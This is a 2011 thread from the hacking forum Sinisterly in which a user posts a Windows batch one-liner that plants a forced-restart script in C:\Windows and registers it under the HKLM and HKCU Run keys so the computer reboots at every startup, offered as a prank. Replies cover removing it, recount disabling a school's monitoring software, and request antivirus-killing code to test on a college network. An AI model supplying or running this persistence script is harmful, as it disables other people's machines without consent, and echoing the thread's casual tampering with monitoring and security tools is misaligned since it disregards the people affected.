Sinisterly
Shutdown Computer Every Time It Is Booted Up - Printable Version

+- Sinisterly (https://sinister.ly)
+-- Forum: Coding (https://sinister.ly/Forum-Coding)
+--- Forum: Coding (https://sinister.ly/Forum-Coding--71)
+--- Thread: Shutdown Computer Every Time It Is Booted Up (/Thread-Shutdown-Computer-Every-Time-It-Is-Booted-Up)

Pages: 1 2


Shutdown Computer Every Time It Is Booted Up - JuiceKing - 06-28-2011

Code:
echo @echo off>c:\windows\hartlell.bat echo break off>>c:\windows\hartlell.bat echo shutdown -r -t 11 -f>>c:\windows\hartlell.bat echo end>>c:\windows\hartlell.bat reg add hkey_local_machine\software\microsoft\windows\currentversion\run /v startAPI /t reg_sz /d c:\windows\hartlell.bat /f reg add hkey_current_user\software\microsoft\windows\currentversion\run /v HAHAHA /t reg_sz /d c:\windows\hartlell.bat /f echo Undergroundkyng Strikes Again PAUSE

Save as: .bat

Have a FUN! :thumbs:


RE: Shutdown Computer Every Time It Is Booted Up - allan - 07-06-2011

can you please tell me , after running this program, how to prevent it to auto shutdown again. thank


RE: Shutdown Computer Every Time It Is Booted Up - Vampex0 - 07-06-2011

You would probably have to make a cmd prompt that reverses and does the opposite to what this does. It could be stopped just by deleting it, not too sure though.


RE: Shutdown Computer Every Time It Is Booted Up - changeusername123 - 07-06-2011

looks nice gonna test it..


RE: Shutdown Computer Every Time It Is Booted Up - Reverence - 07-07-2011

To get this out you have to go to your registry editor as fast as possible in the start of the computer, and delete the file in the specified registry above.


RE: Shutdown Computer Every Time It Is Booted Up - ♠J0K3R♠ - 07-07-2011

Old school but interesting way.. good share.


RE: Shutdown Computer Every Time It Is Booted Up - Joesf - 07-07-2011

Aha, making a shutdown batchfile run at startup was my entry into this world of mischief and had alot of fun with it in secondary school.

Another thing that was fun in secondary school was to open a new word doc, enter text, hit shutdown button, then click cancel on word save prompt and this would also stop the shutdown. The best bit was, at that point, it had already killed the teachers monitoring software.

Good share anyway Wink


RE: Shutdown Computer Every Time It Is Booted Up - JuiceKing - 07-08-2011

(07-07-2011, 04:07 PM)DeathEater Wrote: it is a nice share bro.did you include code to kill AV in this program.I want to test it in our college.

No it's not kill av's...I have code for kill av's...


RE: Shutdown Computer Every Time It Is Booted Up - Mastermrz - 07-12-2011

Wait, does this shut down your computer when it your computer starts up? How do you delete it then? Im guessing Safe mode?


RE: Shutdown Computer Every Time It Is Booted Up - JuiceKing - 07-12-2011

(07-12-2011, 05:41 AM)Mastermrz Wrote: Wait, does this shut down your computer when it your computer starts up? How do you delete it then? Im guessing Safe mode?

Yeah every time when is start up batch shtudown the computer...Look at this code:

Code:
echo @echo off>c:\windows\hartlell.bat echo break off>>c:\windows\hartlell.bat echo shutdown -r -t 11 -f>>c:\windows\hartlell.bat echo end>>c:\windows\hartlell.bat reg add hkey_local_machine\software\microsoft\windows\currentversion\run /v startAPI /t reg_sz /d c:\windows\hartlell.bat /f reg add hkey_current_user\software\microsoft\windows\currentversion\run /v HAHAHA /t reg_sz /d c:\windows\hartlell.bat /f

try to delete in c:\windows\hartlell.bat

delete hartlell.bat

then delete registry:
hkey_local_machine\software\microsoft\windows\currentversion\run /v startAPI /t reg_sz /d c:\windows\hartlell.bat /f

hkey_current_user\software\microsoft\windows\currentversion\run /v HAHAHA /t reg_sz /d c:\windows\hartlell.bat /f


P.S. Try this batch on virtual machine...not on your computer...